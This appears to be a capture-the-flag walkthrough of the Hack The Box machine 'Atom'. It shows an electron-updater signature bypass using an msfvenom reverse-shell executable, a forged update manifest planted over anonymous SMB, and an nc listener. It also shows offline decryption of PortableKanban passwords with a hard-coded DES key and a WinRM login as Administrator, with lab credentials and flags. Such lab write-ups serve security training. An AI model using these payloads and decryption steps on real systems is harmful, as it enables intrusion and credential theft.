HTB Atom done
Atom
OS:
Windows
Technology:
Electron desktop client (electron-updater), Redis, PortableKanban
IP Address:
10.10.10.237
Open ports:
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Users and passwords:
From config file PortableKanban.cfg (DbEncPassword, DES-encrypted with PortableKanban's hard-coded key):
P(enc): Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb
P(dec): kidvscat_yes_kidvscat (also the cleartext requirepass in redis.windows.conf)
---
From the Administrator user object in Redis (EncryptedPassword), decrypted with CyberChef; reused for the Windows Administrator account:
L: administrator
P(enc): Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
P(dec): kidvscat_admin_@123
Nmap
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ sudo nmap -A -sV --script=default -p- --open -oA 10.10.10.237_nmap 10.10.10.237 ; cat 10.10.10.237_nmap.nmap | grep "tcp.*open"
[sudo] password for kali:
Starting Nmap 7.93 ( https://nmap.org ) at 2024-04-12 09:55 CEST
Nmap scan report for 10.10.10.237
Host is up (0.047s latency).
Not shown: 65528 filtered tcp ports (no-response)
Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
PORT STATE SERVICE VERSION
80/tcp open http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heed Solutions
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
135/tcp open msrpc Microsoft Windows RPC
443/tcp open ssl/http Apache httpd 2.4.46 ((Win64) OpenSSL/1.1.1j PHP/7.3.27)
|_http-server-header: Apache/2.4.46 (Win64) OpenSSL/1.1.1j PHP/7.3.27
|_ssl-date: TLS randomness does not represent time
| tls-alpn:
|_ http/1.1
| ssl-cert: Subject: commonName=localhost
| Not valid before: 2009-11-10T23:48:47
|_Not valid after: 2019-11-08T23:48:47
| http-methods:
|_ Potentially risky methods: TRACE
|_http-title: Heed Solutions
445/tcp open microsoft-ds Windows 10 Pro 19042 microsoft-ds (workgroup: WORKGROUP)
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
6379/tcp open redis Redis key-value store
7680/tcp open pando-pub?
Open the website: http://10.10.10.237 (Heed Solutions)
It links to the desktop client installer under /releases/. Download it: heed_setup_v1.0.0.zip
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Atom/heed_windows]
└─$ wget http://10.10.10.237/releases/heed_setup_v1.0.0.zip
--2024-04-12 10:30:41-- http://10.10.10.237/releases/heed_setup_v1.0.0.zip
Connecting to 10.10.10.237:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 46566143 (44M) [application/zip]
Saving to: ‘heed_setup_v1.0.0.zip’
heed_setup_v1.0.0.zip 100%[==============================================>] 44.41M 1.65MB/s in 28s
2024-04-12 10:31:10 (1.61 MB/s) - ‘heed_setup_v1.0.0.zip’ saved [46566143/46566143]
┌──(kali㉿pentest)-[/mnt/…/writeups/HTB/HTB_Atom/heed_windows]
└─$ unzip heed_setup_v1.0.0.zip -d heed_unzip
Archive: heed_setup_v1.0.0.zip
inflating: heed_unzip/heedv1 Setup 1.0.0.exe
┌──(kali㉿pentest)-[/mnt/…/HTB/HTB_Atom/heed_windows/heed_unzip]
└─$ cd heed_setup
┌──(kali㉿pentest)-[/mnt/…/HTB_Atom/heed_windows/heed_unzip/heed_setup]
└─$ 7z x ../heedv1\ Setup\ 1.0.0.exe 1>/dev/null && ls
'$PLUGINSDIR' 'Uninstall heedv1.exe'
┌──(kali㉿pentest)-[/mnt/…/HTB_Atom/heed_windows/heed_unzip/heed_setup]
└─$ cd '$PLUGINSDIR/'
┌──(kali㉿pentest)-[/mnt/…/heed_windows/heed_unzip/heed_setup/$PLUGINSDIR]
└─$ ls
app-64.7z nsis7z.dll nsProcess.dll SpiderBanner.dll StdUtils.dll System.dll WinShell.dll
┌──(kali㉿pentest)-[/mnt/…/heed_windows/heed_unzip/heed_setup/$PLUGINSDIR]
└─$ mkdir app-64 && cd app-64 && 7z x ../app-64.7z 1>/dev/null && ls
chrome_100_percent.pak libEGL.dll resources VkLayer_core_validation.dll
chrome_200_percent.pak libGLESv2.dll resources.pak VkLayer_object_tracker.dll
d3dcompiler_47.dll LICENSE.electron.txt snapshot_blob.bin VkLayer_parameter_validation.dll
ffmpeg.dll LICENSES.chromium.html swiftshader VkLayer_threading.dll
heedv1.exe locales v8_context_snapshot.bin VkLayer_unique_objects.dll
icudtl.dat natives_blob.bin VkICD_mock_icd.dll
┌──(kali㉿pentest)-[/mnt/…/heed_unzip/heed_setup/$PLUGINSDIR/app-64]
└─$ cd resources
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ ls
app.asar app-update.yml electron.asar elevate.exe inspector
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ npx @electron/asar extract app.asar app.asar_unpack
Read the config files
main.js pulls in electron-updater and calls checkForUpdates() as soon as the app is ready, and app-update.yml configures a generic provider pointed at http://updates.atom.htb, so every client fetches its latest.yml manifest from there at startup. That update channel is the attack surface; look for a known electron-updater bug.
const {autoUpdater} = require("electron-updater");
---
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ cat app-update.yml
provider: generic
url: 'http://updates.atom.htb'
publisherName:
- HackTheBox
┌──(kali㉿pentest)-[/mnt/…/heed_setup/$PLUGINSDIR/app-64/resources]
└─$ cd app.asar_unpack
┌──(kali㉿pentest)-[/mnt/…/$PLUGINSDIR/app-64/resources/app.asar_unpack]
└─$ cat main.js
const {app, BrowserWindow, Menu, protocol, ipcMain} = require('electron');
const log = require('electron-log');
const {autoUpdater} = require("electron-updater");
const path = require('path');

autoUpdater.logger = log;
autoUpdater.logger.transports.file.level = 'debug';

let win;
let addWindow;

function createNote(){
    addWindow = new BrowserWindow({
        webPreferences: {
            // renderer gets full Node access
            nodeIntegration: true,
        },
        width: 500,
        height: 200,
        title: "Create Note"
    });
    addWindow.loadURL(`file://${__dirname}/createNote.html`);
    return addWindow;
}

const template = [
    {
        label : "File",
        submenu:[
            {
                label: "Create Note",
                click(){
                    createNote();
                }
            },
            {
                label: "Delete Notes",
                click(){
                    win.webContents.send('note:clear');
                }
            },
            {
                label: "Quit",
                click(){
                    app.quit();
                }
            }
        ]
    }
];

function sendStatusToWindow(text) {
    log.info(text);
    win.webContents.send('message', text);
}

function createDefaultWindow() {
    win = new BrowserWindow({
        webPreferences: {
            nodeIntegration: true,
        },
        icon: path.join(__dirname, 'icons/ico.png')
    });
    win.loadURL(`file://${__dirname}/version.html#v${app.getVersion()}`);
    win.on('closed', function(){
        app.quit();
    });
    return win;
}

app.on('ready', function() {
    // Create the Menu
    const menu = Menu.buildFromTemplate(template);
    Menu.setApplicationMenu(menu);
    createDefaultWindow();
});

ipcMain.on('note:add', function(e, note){
    win.webContents.send('note:add', note);
    addWindow.close();
})

autoUpdater.on('checking-for-update', () => {
    sendStatusToWindow('Checking for update...');
})
autoUpdater.on('update-available', (ev, info) => {
    sendStatusToWindow('Update available.');
})
autoUpdater.on('update-not-available', (ev, info) => {
    sendStatusToWindow('Update not available.');
})
autoUpdater.on('error', (ev, err) => {
    sendStatusToWindow('Error in auto-updater.');
})
autoUpdater.on('download-progress', (ev, progressObj) => {
    sendStatusToWindow('Download progress...');
})
autoUpdater.on('update-downloaded', (ev, info) => {
    sendStatusToWindow('Update downloaded; Installing the update...');
});

app.on('window-all-closed', () => {
    app.quit();
});

// Second handler for the same event: the downloaded installer is run
// immediately, with no prompt to the user.
autoUpdater.on('update-downloaded', (ev, info) => {
    autoUpdater.quitAndInstall();
})

// Update check fires unconditionally at startup.
app.on('ready', function() {
    autoUpdater.checkForUpdates();
});
Exploit - Signature Validation Bypass Leading to RCE in Electron-Updater
https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html
The client downloads latest.yml from the provider URL and, if the manifest's version is newer than the installed one, fetches the file named in path and installs it. Two checks sit between download and execution: the file's sha512 must match the base64 digest in the manifest, and on Windows electron-updater verifies the installer's Authenticode signature against publisherName by running Get-AuthenticodeSignature through powershell.exe. Per the Doyensec write-up, the downloaded file name was placed inside a single-quoted PowerShell string without escaping, so a name containing a single quote broke the command; the updater treated the resulting failure as "signature check unavailable" and went ahead with the install. The hash check is real, so the forged manifest must carry the correct sha512 of the payload; the signature check is defeated simply by a quote in the file name.
Create the payload with msfvenom. The single quote in the file name is what triggers the bypass, so keep it.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ msfvenom -p windows/shell_reverse_tcp LHOST=10.10.14.6 LPORT=4444 -f exe -o "payload'.exe"
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x86 from the payload
No encoder specified, outputting raw payload
Payload size: 324 bytes
Final size of exe file: 73802 bytes
Saved as: payload'.exe
Calculate the sha512 of payload'.exe in the encoding latest.yml expects: base64 of the raw 64-byte digest (xxd -r -p turns the hex back into bytes first), not the hex string.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ shasum -a 512 payload\'.exe | cut -d " " -f1 | xxd -r -p | base64 -w0
D7jHTpKXzFirs6C52vLrvO4Cijrpo50DvBGEpJlKCHir8dnheoOa2N+POIt+iefy0pcnKRd8AKT9qwILRWe//Q==
Create a forged latest.yml. version must be greater than the installed 1.0.0 or the client reports "Update not available"; path points at the attacker's web server and keeps the quoted file name.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ cat latest.yml
version: 1.2.3
path: http://10.10.14.6/payload'.exe
sha512: D7jHTpKXzFirs6C52vLrvO4Cijrpo50DvBGEpJlKCHir8dnheoOa2N+POIt+iefy0pcnKRd8AKT9qwILRWe//Q==
releaseDate: '2024-04-12T10:16:01.627Z'
Serve the payload over HTTP on the host and port named in the manifest's path
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
Upload the manifest to the SMB share. Software_Updates is writable without credentials, and its client1..3 folders are what the update checks of the heed clients end up reading (there are three instances, heedv1..v3, as the shortcuts on jason's desktop show later); write latest.yml into all three so whichever client polls next picks it up.
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ smbclient -N //10.10.10.237/Software_Updates -c 'put latest.yml client1/latest.yml; put latest.yml client2/latest.yml; put latest.yml client3/latest.yml'
putting file latest.yml as \client1\latest.yml (1.6 kb/s) (average 1.6 kb/s)
putting file latest.yml as \client2\latest.yml (1.2 kb/s) (average 1.4 kb/s)
putting file latest.yml as \client3\latest.yml (1.3 kb/s) (average 1.4 kb/s)
Listen on port 4444 for the reverse shell (in practice start this before the upload). The client fetches the manifest, downloads payload'.exe, verifies the hash, skips the broken signature check and runs the file, which connects back as jason:
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.237] 49241
Microsoft Windows [Version 10.0.19042.906]
(c) Microsoft Corporation. All rights reserved.
C:\WINDOWS\system32>whoami
whoami
atom\jason
C:\WINDOWS\system32>whoami /all
whoami /all
USER INFORMATION
----------------
User Name SID
========== ==============================================
atom\jason S-1-5-21-1199094703-3580107816-3092147818-1002
GROUP INFORMATION
-----------------
Group Name Type SID Attributes
====================================== ================ ============ ==================================================
Everyone Well-known group S-1-1-0 Mandatory group, Enabled by default, Enabled group
BUILTIN\Users Alias S-1-5-32-545 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\INTERACTIVE Well-known group S-1-5-4 Mandatory group, Enabled by default, Enabled group
CONSOLE LOGON Well-known group S-1-2-1 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users Well-known group S-1-5-11 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization Well-known group S-1-5-15 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Local account Well-known group S-1-5-113 Mandatory group, Enabled by default, Enabled group
LOCAL Well-known group S-1-2-0 Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NTLM Authentication Well-known group S-1-5-64-10 Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level Label S-1-16-8192
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ==================================== ========
SeShutdownPrivilege Shut down the system Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeUndockPrivilege Remove computer from docking station Disabled
SeIncreaseWorkingSetPrivilege Increase a process working set Disabled
SeTimeZonePrivilege Change the time zone Disabled
ERROR: Unable to get user claims information.
C:\WINDOWS\system32>
Read flag: user.txt
C:\WINDOWS\system32>cd C:\USers
cd C:\USers
C:\Users>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users
04/01/2021 03:53 AM <DIR> .
04/01/2021 03:53 AM <DIR> ..
04/13/2021 02:41 AM <DIR> Administrator
04/13/2021 02:35 AM <DIR> jason
04/01/2021 04:49 AM <DIR> Public
0 File(s) 0 bytes
5 Dir(s) 5,474,402,304 bytes free
C:\Users>cd jason
cd jason
C:\Users\jason>cd Desktop
cd Desktop
C:\Users\jason\Desktop>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Desktop
04/02/2021 10:29 PM <DIR> .
04/02/2021 10:29 PM <DIR> ..
03/31/2021 02:09 AM 2,353 heedv1.lnk
03/31/2021 02:09 AM 2,353 heedv2.lnk
03/31/2021 02:09 AM 2,353 heedv3.lnk
04/12/2024 12:54 AM 34 user.txt
4 File(s) 7,093 bytes
2 Dir(s) 5,474,402,304 bytes free
C:\Users\jason\Desktop>type user.txt
type user.txt
44627baaa8544990c1401e435e323ce6
PortableKanban
PortableKanban's config, PortableKanban.cfg in jason's Downloads, points the app at the local Redis (DataSource RedisServer, DbServer localhost, DbPort 6379) and stores the Redis password encrypted in DbEncPassword. The encryption uses a hard-coded key, so the value decrypts offline (recipe below) to the Redis password.
---
C:\Users\jason\Desktop>cd ../Downloads/
cd ../Downloads/
C:\Users\jason\Downloads>dir
dir
Volume in drive C has no label.
Volume Serial Number is 9793-C2E6
Directory of C:\Users\jason\Downloads
04/02/2021 08:00 AM <DIR> .
04/02/2021 08:00 AM <DIR> ..
03/31/2021 02:36 AM <DIR> node_modules
04/02/2021 08:21 PM <DIR> PortableKanban
0 File(s) 0 bytes
4 Dir(s) 5,473,034,240 bytes free
C:\Users\jason\Downloads>cd PortableKanban
cd PortableKanban
C:\Users\jason\Downloads\PortableKanban>type PortableKanban.cfg
type PortableKanban.cfg
{"RoamingSettings":{"DataSource":"RedisServer","DbServer":"localhost","DbPort":6379,"DbEncPassword":"Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb","DbServer2":"","DbPort2":6379,"DbEncPassword2":"","DbIndex":0,"DbSsl":false,"DbTimeout":10,"FlushChanges":true,"UpdateInterval":5,"AutoUpdate":true,"Caption":"My Tasks","RightClickAction":"Nothing","DateTimeFormat":"ddd, M/d/yyyy h:mm tt","BoardForeColor":"WhiteSmoke","BoardBackColor":"DimGray","ViewTabsFont":"Segoe UI, 9pt","SelectedViewTabForeColor":"WhiteSmoke","SelectedViewTabBackColor":"Black","HeaderFont":"Segoe UI, 11.4pt","HeaderShowCount":true,"HeaderShowLimit":true,"HeaderShowEstimates":true,"HeaderShowPoints":false,"HeaderForeColor":"WhiteSmoke","HeaderBackColor":"Gray","CardFont":"Segoe UI, 11.4pt","CardLines":3,"CardTextAlignment":"Center","CardShowMarks":true,"CardShowInitials":false,"CardShowTags":true,"ThickTags":false,"DefaultTaskForeColor":"WhiteSmoke","DefaultTaskBackColor":"Gray","SelectedTaskForeColor":"WhiteSmoke","SelectedTaskBackColor":"Black","SelectedTaskFrames":false,"SelectedTaskFrameColor":"WhiteSmoke","SelectedTaskThickFrames":false,"WarmTasksThreshold":0,"WarmTaskForeColor":"WhiteSmoke","WarmTaskBackColor":"MediumBlue","WarmTaskFrameColor":"Goldenrod","HotTasksThreshold":1,"HotTaskForeColor":"WhiteSmoke","HotTaskBackColor":"Blue","HotTaskFrameColor":"Yellow","OverdueTaskForeColor":"WhiteSmoke","OverdueTaskBackColor":"OrangeRed","OverdueTaskFrameColor":"OrangeRed","WarmHotTaskFrames":false,"WarmHotTaskThickFrames":false,"BusinessDaysOnly":false,"TrackedTaskForeColor":"WhiteSmoke","TrackedTaskBackColor":"Red","ShowSubtasksInEditBox":true,"CheckForDuplicates":true,"WarnBeforeDeleting":true,"ProgressIncrement":5,"DisableCreated":false,"DefaultPriority":"Low","DefaultDeadlineTime":"PT0S","ShowTaskComments":true,"IntervalFormat":"Hours","WorkUnitDuration":1,"SelectAnyColumn":false,"ShowInfo":true,"CardInfoFont":"Segoe UI, 
9pt","InfoTextAlignment":"Center","InfoShowPriority":true,"InfoShowTopic":true,"InfoShowPerson":true,"InfoShowCreated":true,"InfoShowDeadlineCompleted":true,"InfoShowSubtasks":false,"InfoShowEstimate":false,"InfoShowSpent":false,"InfoShowPoints":false,"InfoShowProgress":true,"InfoShowCommentsCount":false,"InfoShowTags":false,"InfoShowCustomFields":false,"ShowToolTips":true,"ToolTipShowText":true,"ToolTipTextLimit":200,"ToolTipShowPriority":true,"ToolTipShowTopic":true,"ToolTipShowPerson":true,"ToolTipShowCreated":false,"ToolTipShowDeadlineCompleted":true,"ToolTipShowSubtasks":true,"ToolTipShowEstimate":true,"ToolTipShowSpent":true,"ToolTipShowPoints":true,"ToolTipShowProgress":true,"ToolTipShowCommentsCount":false,"ToolTipShowTags":false,"ToolTipShowCustomFields":false,"TimerWorkInterval":25,"TimeShortBreakInterval":5,"TimerLongBreakInterval":15,"PlaySound":1000,"ActivateWindow":false,"TaskBarProgress":true,"EnableTimeTracking":true,"AlertOnNewTask":false,"AlertOnModifiedTask":false,"AlertOnCompletedTask":false,"AlertOnCanceledTask":false,"AlertOnReassignedTask":false,"AlertOnMovedTask":false,"AlertOnDeletedTask":false,"AlertMethod":"None","EmailLogon":true,"EmailReviewMessage":true,"EmailSmtpPort":587,"EmailSmtpDeliveryMethod":"Network","EmailSmtpUseDefaultCredentials":false,"EmailSmtpEnableSSL":false,"EmailSmtpTimeout":5,"EmailAttachFile":true,"EmailNewTaskSubject":"PortableKanban Notification: New task has been created","EmailDeletedTaskSubject":"PortableKanban Notification: Task has been deleted","EmailEditedTaskSubject":"PortableKanban Notification: Task has been modified","EmailCompletedTaskSubject":"PortableKanban Notification: Task has been completed","EmailCanceledTaskSubject":"PortableKanban Notification: Task has been canceled","EmailReassignedTaskSubject":"PortableKanban Notification: Task has been reassigned","EmailMovedTaskSubject":"PortableKanban Notification: Task has been moved","EmailSignature":"This is automatic 
message.","PluginsSettings":{"bd5d2026e1f7424eab8690a62ad05ad2":{},"07a0d797c97c41f789af21ff4298754e":{"SourceColumnId":"00000000000000000000000000000000","DestinationColumnId":"00000000000000000000000000000000","Age":30},"2e470c79feb946f2b6e74b35245f8e80":{"FromDate":"\/Date(1617346800000-0700)\/","ToDate":"\/Date(1617346800000-0700)\/","IncludeTopics":false,"IncludeTags":false,"IncludeComments":false,"ReportType":"Html","SortByUser":true},"680986568fed41c381ef9f230feaa102":{"RunOnStartup":false},"24b7acead7984f8ab16bdb0ae8559fb6":{"TopicId":"00000000000000000000000000000000","ColumnId":"00000000000000000000000000000000","FromPersonId":"00000000000000000000000000000000","ToPersonId":"00000000000000000000000000000000"}},"AutoLogon":false,"LogonUserName":"","EncLogonPassword":"","ExitOnSuspend":false,"DropFilesFolder":"Files","UseRelativePath":true,"ConfirmFileDeleteion":true,"DefaultDropFilesActionOption":"Copy","CreateNewTaskForEachDroppedFile":true,"ParseDroppedEmails":true,"RestoreWindowsLocation":true,"DesktopShortcut":false,"DailyBackup":false,"BackupTime":"PT0S","BlockEscape":false,"BlackWhiteIcon":true,"ShowTimer":true,"ViewId":"00000000000000000000000000000000","SearchInSubtasks":false,"ReportIncludeComments":true,"ReportIncludeSubTasks":true,"ReportIncludeTimeTracks":true,"ReportIncludeCustomFields":true},"LocalSettingsMap":{"ATOM":{"Left":320,"Top":2,"Width":800,"Height":601,"Minimized":false,"Maximized":false,"FullScreen":false,"Hidden":false,"AboutBoxLeft":0,"AboutBoxTop":0,"AboutBoxWidth":0,"AboutBoxHeight":0,"EditBoxLeft":0,"EditBoxTop":0,"EditBoxWidth":0,"EditBoxHeight":0,"EditBoxSplitterOrientation":1,"EditBoxSplitterDistance":0,"EditBoxFontSize":0,"EditBoxCommentsSortDirection":"Ascending","ReportBoxLeft":370,"ReportBoxTop":27,"ReportBoxWidth":700,"ReportBoxHeight":551,"SetupBoxLeft":370,"SetupBoxTop":52,"SetupBoxWidth":700,"SetupBoxHeight":501,"ViewBoxLeft":0,"ViewBoxTop":0,"ViewBoxWidth":0,"ViewBoxHeight":0,"LogonBoxLeft":520,"LogonBoxTop":202,"Lo
gonBoxWidth":400,"LogonBoxHeight":201}}}
---
Parse the output from Kali (jq)
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ cat PortableKanban.cfg| jq . | head
{
"RoamingSettings": {
"DataSource": "RedisServer",
"DbServer": "localhost",
"DbPort": 6379,
"DbEncPassword": "Odh7N3L9aVSeHQmgK/nj7RQL8MEYCUMb",
"DbServer2": "",
"DbPort2": 6379,
"DbEncPassword2": "",
"DbIndex": 0,
Redis
Read the config files in the Redis install folder
redis.windows.conf and redis.windows-service.conf carry requirepass in cleartext; it matches the decrypted DbEncPassword, so the encrypted value is not even needed to reach Redis:
C:\>cd "C:\Program Files\Redis"
cd "C:\Program Files\Redis"
C:\Program Files\Redis>type *.conf | findstr pass
type *.conf | findstr pass
redis.windows-service.conf
redis.windows.conf
requirepass kidvscat_yes_kidvscat
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
requirepass kidvscat_yes_kidvscat
# If the master is password protected (using the "requirepass" configuration
# masterauth <master-password>
# resync is enough, just passing the portion of data the slave missed while
# 150k passwords per second against a good box. This means that you should
# use a very strong password otherwise it will be very easy to break.
# requirepass foobared
Connect to Redis
With that password we can dump the keys. PortableKanban keeps its user objects in Redis; the only user is Administrator (Role: Admin), and its EncryptedPassword is encrypted with the same scheme as the config value (note the shared ciphertext prefix: same key, same IV, and both passwords start with kidvscat):
L: Administrator
P(enc): Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi
---
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ redis-cli -h 10.10.10.237 -a kidvscat_yes_kidvscat
Warning: Using a password with '-a' or '-u' option on the command line interface may not be safe.
10.10.10.237:6379> keys
(error) ERR wrong number of arguments for 'keys' command
10.10.10.237:6379> keys *
1) "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
2) "pk:ids:User"
3) "pk:ids:MetaDataClass"
4) "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
10.10.10.237:6379> get "pk:urn:metadataclass:ffffffff-ffff-ffff-ffff-ffffffffffff"
"{\"Id\":\"ffffffffffffffffffffffffffffffff\",\"SchemaVersion\":\"4.2.0.0\",\"SchemaVersionModified\":\"\\/Date(1617420120000-0700)\\/\",\"SchemaVersionModifiedBy\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"SchemaVersionChecked\":\"\\/Date(-62135596800000-0000)\\/\",\"SchemaVersionCheckedBy\":\"00000000000000000000000000000000\",\"TimeStamp\":637530169345346438}"
10.10.10.237:6379> get "pk:ids:User"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get "pk:ids:MetaDataClass"
(error) WRONGTYPE Operation against a key holding the wrong kind of value
10.10.10.237:6379> get "pk:urn:user:e8e29158-d70d-44b1-a1ba-4949d52790a0"
"{\"Id\":\"e8e29158d70d44b1a1ba4949d52790a0\",\"Name\":\"Administrator\",\"Initials\":\"\",\"Email\":\"\",\"EncryptedPassword\":\"Odh7N3L9aVQ8/srdZgG2hIR0SSJoJKGi\",\"Role\":\"Admin\",\"Inactive\":false,\"TimeStamp\":637530169606440253}"
10.10.10.237:6379>
Decrypt the administrator's password
PortableKanban 4.3.6578.38136 (exploit-db 49409) encrypts stored passwords with DES-CBC under a hard-coded key 7ly6UznJ and IV XuVUm5fR, so any EncryptedPassword is recoverable offline: base64-decode, DES-CBC decrypt, strip the padding. The recovered value is reused for the Windows Administrator account.
L: administrator
P(dec): kidvscat_admin_@123
CyberChef recipe
https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)DES_Decrypt(%7B'option':'UTF8','string':'7ly6UznJ'%7D,%7B'option':'UTF8','string':'XuVUm5fR'%7D,'CBC','Raw','Raw')&input=T2RoN04zTDlhVlE4L3NyZFpnRzJoSVIwU1NKb0pLR2k
Log in remotely as administrator over WinRM (port 5985) with the recovered password
┌──(kali㉿pentest)-[/mnt/oscp/writeups/HTB/HTB_Atom]
└─$ evil-winrm -i 10.10.10.237 -u administrator -p 'kidvscat_admin_@123'
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
=============================== ========================================= =======
SeAssignPrimaryTokenPrivilege Replace a process level token Enabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Enabled
SeSecurityPrivilege Manage auditing and security log Enabled
SeTakeOwnershipPrivilege Take ownership of files or other objects Enabled
SeLoadDriverPrivilege Load and unload device drivers Enabled
SeSystemProfilePrivilege Profile system performance Enabled
SeSystemtimePrivilege Change the system time Enabled
SeProfileSingleProcessPrivilege Profile single process Enabled
SeIncreaseBasePriorityPrivilege Increase scheduling priority Enabled
SeCreatePagefilePrivilege Create a pagefile Enabled
SeBackupPrivilege Back up files and directories Enabled
SeRestorePrivilege Restore files and directories Enabled
SeShutdownPrivilege Shut down the system Enabled
SeDebugPrivilege Debug programs Enabled
SeSystemEnvironmentPrivilege Modify firmware environment values Enabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeRemoteShutdownPrivilege Force shutdown from a remote system Enabled
SeUndockPrivilege Remove computer from docking station Enabled
SeManageVolumePrivilege Perform volume maintenance tasks Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled
SeCreateGlobalPrivilege Create global objects Enabled
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled
SeTimeZonePrivilege Change the time zone Enabled
SeCreateSymbolicLinkPrivilege Create symbolic links Enabled
Read flag: root.txt
*Evil-WinRM* PS C:\Users\Administrator\Documents> cd ../Desktop
*Evil-WinRM* PS C:\Users\Administrator\Desktop> dir
Directory: C:\Users\Administrator\Desktop
Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 4/12/2024 12:54 AM 34 root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
41219815ce7d5099ba65fd39022b53c2
References
[Signature Validation Bypass Leading to RCE In Electron-Updater](https://blog.doyensec.com/2020/02/24/electron-updater-update-signature-bypass.html)
[PortableKanban 4.3.6578.38136 - Encrypted Password Retrieval](https://www.exploit-db.com/exploits/49409)
[CyberChef recipe - PortableKanban DES decrypt](https://gchq.github.io/CyberChef/#recipe=From_Base64('A-Za-z0-9%2B/%3D',true,false)DES_Decrypt(%7B'option':'UTF8','string':'7ly6UznJ'%7D,%7B'option':'UTF8','string':'XuVUm5fR'%7D,'CBC','Raw','Raw')&input=T2RoN04zTDlhVlE4L3NyZFpnRzJoSVIwU1NKb0pLR2k)
Lessons Learned